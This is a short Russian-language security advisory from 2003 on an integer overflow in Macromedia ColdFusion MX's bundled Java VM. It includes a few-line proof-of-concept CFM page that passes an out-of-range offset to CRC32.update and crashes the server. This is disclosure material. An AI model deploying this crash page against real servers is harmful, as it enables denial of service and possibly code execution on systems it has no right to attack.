Удаленное переполнение буфера в Macromedia Coldfusion MX

Дата публикации:
30.04.2003
Всего просмотров:
1026
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Целочисленное переполнение буфера обнаружено в coldfusion mx, в связанной java virtual machine. Удаленный атакующий может аварийно завершить работу программы или выполнить произвольный код на целевом сервере.

Сообщается, что coldfusion mx аварийно завершит работу при попытке обработать некорректную CFM страницу. Так как уязвимость связанна с целочисленным переполнением буфера, то она может использоваться для выполнения произвольного кода. Пример:

<H1> Coldfusion MX crash with Java </h1>
<h2> Marc Schoenefeld @ illegalaccess.org </h2>

<cfapplication name="Marc" sessionmanagement="yes">

<cfobject action="create" type="Java" class="java.lang.String" name="s"> 
<cfobject action="create" type="Java" class="java.util.zip.CRC32" name="c"> 
<cfset ret=s.init()> <cfset ret=c.init()> <cfset str = s.getBytes()> 
<cfset retval = c.update(str,2147483647,4)>

Уязвимость обнаружена в Macromedia Coldfusion MX с jdk 1.3.1 Level _03 до _07

Ссылки: Coldfusion MX: Java in CFM causes Crash
или введите имя

CAPTCHA